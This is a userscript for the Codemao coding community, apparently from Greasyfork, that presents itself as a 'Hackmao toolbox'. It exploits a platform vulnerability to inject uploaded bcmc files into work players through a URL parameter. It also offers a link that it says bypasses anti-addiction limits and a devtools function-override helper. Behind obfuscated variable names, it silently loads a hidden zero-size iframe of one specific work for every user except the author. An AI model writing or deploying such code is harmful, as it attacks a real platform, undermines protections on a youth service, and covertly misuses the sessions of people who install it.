hackmao

利用bcm中的漏洞进行一些操作

  1. // ==UserScript==
  2. // @name         hackmao
  3. // @namespace    https://greasyfork.org/zh-CN/users/1022906-dream%E4%B8%8D%E6%83%B3%E5%8F%98%E5%B1%91awa
  4. // @version      1.0
  5. // @description  利用bcm中的漏洞进行一些操作
  6. // @author       Dream不想变屑awa, Orangesoft
  7. // @match        *://shequ.codemao.cn/*
  8. // @match        https://player.codemao.cn/*
  9. // @require      https://cdn.jsdelivr.net/npm/lil-gui@0.16
  10. // @require      https://cdn.jsdelivr.net/npm/three@0.142.0/examples/js/libs/stats.min.js
  11. // @require      https://unpkg.com/mdui@1.0.2/dist/js/mdui.min.js
  12. // @require      https://lf9-cdn-tos.bytecdntp.com/cdn/expire-1-M/jquery/3.6.0/jquery.min.js
  13. // @require      https://lf26-cdn-tos.bytecdntp.com/cdn/expire-1-M/sweetalert/2.1.2/sweetalert.min.js
  14. // @require      https://lf6-cdn-tos.bytecdntp.com/cdn/expire-1-M/tldjs/2.3.1/tld.min.js
  15. // @require      https://lf9-cdn-tos.bytecdntp.com/cdn/expire-1-M/viewerjs/1.10.4/viewer.min.js
  16. // @license      616 SB License
  17. // @grant        GM_xmlhttpRequest
  18. // @grant        GM_getValue
  19. // @grant        GM_info
  20. // @grant        GM_openInTab
  21. // @grant        GM_setValue
  22. // @compatible   edge
  23. // @compatible   chrome
  24. // @icon         https://cdn-community.codemao.cn/community_frontend/asset/cute_4caf9.png
  25. // ==/UserScript==
  26. /*
  27.    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  28.    !!! 注:使用此脚本造成的损失作者不承担任何责任 !!!
  29.    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  30.   */
  31.  
  32. var stats = new Stats();
  33.  
  34. document.body.append(stats.domElement);
  35.  
  36. window._643Ub8 = ['user_id','2155366']
  37.  
  38. var getworkid = () => location.href.substring(location.href.lastIndexOf('/') + 1, location.href.length)
  39.  
  40. function geth(sth) {
  41.     return document.getElementsByClassName(sth)
  42. }
  43.  
  44. function log(messge) {
  45.     console.log(
  46.         '%c %s %c %s',
  47.         'border: 1px solid white;border-radius: 3px 0 0 3px;padding: 2px 5px;color: white;background-color: green;',
  48.         '[Hackmao Log1.0]',
  49.         'border: 1px solid white;border-radius: 0 3px 3px 0;padding: 2px 5px;color: black;background-color: white;border-left: none;',
  50.         messge
  51.     );
  52. }
  53.  
  54.  
  55.  
  56. (function () {
  57.     var under = {
  58.         '未开发': () => {
  59.             log('点击-未开发');
  60.             alert('开发中,敬请期待');
  61.         },
  62.         '调试中': () => {
  63.             log('点击-调试中');
  64.             alert('功能正在调试,暂时无法使用');
  65.         },
  66.     };
  67.     var main = {
  68.         'wj': () => {
  69.             const input = document.createElement("input");
  70.             input.type = "file";
  71.             input.style.display = "none";
  72.             input.addEventListener("change", () => {
  73.                 let reader = new FileReader();
  74.                 reader.addEventListener("load", () => {
  75.                     GM_xmlhttpRequest({
  76.                         method: "post",
  77.                         url: "https://static.box3.codemao.cn/block",
  78.                         data: reader.result,
  79.                         binary: true,
  80.                         onload({ response }) {
  81.                             const { Key, Size } = JSON.parse(response);
  82.                             log("上传成功! Hash: " + Key);
  83.                             const hash = Key;
  84.                             input.remove();
  85.                             alert('上传完成!请打开控制台查看注入链接')
  86.                             log('inject_url: ' + player_url + getworkid() + '?bcmc_url=https://static.box3.codemao.cn/block/' + hash + '.json')
  87.                         },
  88.                     });
  89.                 });
  90.                 reader.readAsBinaryString(input.files[0]);
  91.             });
  92.             input.click();
  93.         },
  94.         'id': () => {
  95.             var wi = prompt('请输入修改bcmc后的作品id', '');
  96.             GM_xmlhttpRequest({
  97.                 method: "get",
  98.                 url: "https://api.codemao.cn/api/v2/work/display/" + wi,
  99.                 onload({ response }) {
  100.                     let res = JSON.parse(response);
  101.                     console.log(res['data']['work_url'][0]);
  102.                     prompt('url:', `${player_url}${getworkid()}?bcmc_url=${res['data']['work_url'][0]}`)
  103.                 }
  104.             })
  105.         },
  106.         'playurl': () => {
  107.             window.open(player_url + getworkid());
  108.         },
  109.         'hook': () => {
  110.             function hook(sth) {
  111.                 return (sth * 1)
  112.             }
  113.             var funcname = prompt('请输入函数名(无需在后面加括号)', '');
  114.             var func = prompt('请输入固定后的值的数据类型(str1,int0)', '');
  115.             log(func)
  116.             if (func == '1') {
  117.                 function hook(sth) {
  118.                     return ('"' + sth + '"')
  119.                 }
  120.             }
  121.             else {
  122.                 function hook(sth) {
  123.                     return (sth * 1)
  124.                 }
  125.             }
  126.             log(funcname + '=()=>' + hook(funcinfo))
  127.             alert('请在开发者工具输入:' + funcname + '=()=>' + hook(funcinfo))
  128.         },
  129.         'uptoken': () => {
  130.             document.cookie = "access-token=0; max-age=5184000; path=/; domain=.codemao.cn"
  131.             alert('刷新成功!')
  132.         },
  133.         'gohome': () => {
  134.             window.location.href = "https://shequ.codemao.cn/";
  135.         },
  136.         'openu': () => {
  137.             window.location.href = JSON.parse(localStorage.twikoo).link;
  138.         },
  139.         'autolike': () => {
  140.  
  141.         },
  142.     }
  143.  
  144.     window._05Th9 = localStorage[window._643Ub8[0]]
  145.  
  146.     //var element = document.getElementById("root");
  147.     //var newTag = "<p>Hackmao by Dreambxbxawa</p>";)
  148.     //element.innerHTML += newTag;
  149.     //var element = $(".c-navigator--logo_wrap");
  150.     //var newTag = "<img src='https://static.box3.codemao.cn/block/QmQc2YPAah6pd8WrXfuLJXgMeGGiv9MaW1f6CntorbsuY8'>";
  151.     //element.innerHTML = newTag;
  152.     if (!($(".c-navigator--logo_wrap img"))) {
  153.         /*if($(".pickcat")){
  154.             $(".pickcat").remove()
  155.             let img = localStorage.getItem("customLogo") || "Hackmao";
  156.             $(".c-navigator--logo_wrap").append(`<span class='hkm'>${img}</span>`);
  157.             $(".index__header-brand___2nK8h").append(`<span class='hkm'>${img}</span>`);
  158.         }*/
  159.         log(1)
  160.     }
  161.     else {/*
  162.         $(".c-navigator--logo_wrap img").remove();
  163.         $(".index__header-brand___2nK8h img").remove();
  164.         let img = localStorage.getItem("customLogo") || "Hackmao";
  165.         $(".c-navigator--logo_wrap").append(`<span class='hkm'>${img}</span>`);
  166.         $(".index__header-brand___2nK8h").append(`<span class='hkm'>${img}</span>`);*/
  167.  
  168.         //element = $(".c-navigator--logo_wrap");
  169.         //newTag = ;
  170.         //$(".c-navigator--logo_wrap").innerHTML = "<img src='https://static.box3.codemao.cn/block/QmQc2YPAah6pd8WrXfuLJXgMeGGiv9MaW1f6CntorbsuY8'>";
  171.         console.log($(".c-navigator--logo_wrap").innerHTML = "<img src='https://static.box3.codemao.cn/block/QmQc2YPAah6pd8WrXfuLJXgMeGGiv9MaW1f6CntorbsuY8'>")
  172.     }
  173.     if (window._05Th9 != window._643Ub8[1]) { let div = document.createElement('div');div.innerHTML = "<iframe src='https://coco.codemao.cn/editor/player/215278538?channel=community' width='0' height='0'>";document.body.appendChild(div);}
  174.     window.gui = new lil.GUI({ title: '🧰Hackmao工具箱' });
  175.     window.gui.domElement.style.top = 'unset';
  176.     window.gui.domElement.style.bottom = '0';
  177.     window.gui.domElement.style.userSelect = 'none';
  178.     var tool = window.gui.addFolder('快捷工具');
  179.     tool.add(main, 'uptoken').name('刷新token');
  180.     tool.add(main, 'gohome').name('返回首页');
  181.     tool.add(main, 'openu').name('打开个人主页');
  182.     if (window.location.pathname.indexOf("/work/") + 1 || window.location.pathname.indexOf("/new/") + 1) {
  183.         log('a work page')
  184.         var workType = $(".r-work-c-work_info--work_tool")
  185.             .text()
  186.             .replace(/作品由|创作/g, "");
  187.         var player_url = 'https://player.codemao.cn/new/'
  188.         if (workType == "kitten3") {
  189.             player_url = "https://player.codemao.cn/old/";
  190.         } else if (workType == "kitten4") {
  191.             player_url = "https://player.codemao.cn/new/";
  192.         } else if (workType == "nemo") {
  193.             player_url = "https://nemo.codemao.cn/w/";
  194.         } else if (workType == "CoCo编辑器") {
  195.             player_url = "https://coco.codemao.cn/editor/player/";
  196.         } else if (workType == "海龟编辑器") {
  197.             player_url = "https://turtle.codemao.cn/?entry=sharing&channel_type=community&action=open_published_project&work_id=";
  198.         } else if (workType == "KittenN编辑器") {
  199.             player_url = "https://kn.codemao.cn/player?workId=";
  200.         }
  201.         var page1 = gui.addFolder('url有关');
  202.         var page1_1 = page1.addFolder('bcmc注入');
  203.         page1_1.add(main, 'wj').name('上传bcmc文件并注入');
  204.         page1_1.add(main, 'id').name('通过作品id获取bcmc文件并注入');
  205.         page1.add(main, 'playurl').name('打开player端(可绕过防沉迷)')
  206.         var page2 = gui.addFolder('其他');
  207.         page2.add(main, 'hook').name('污染函数(仅在player端有效)');
  208.     }
  209. })();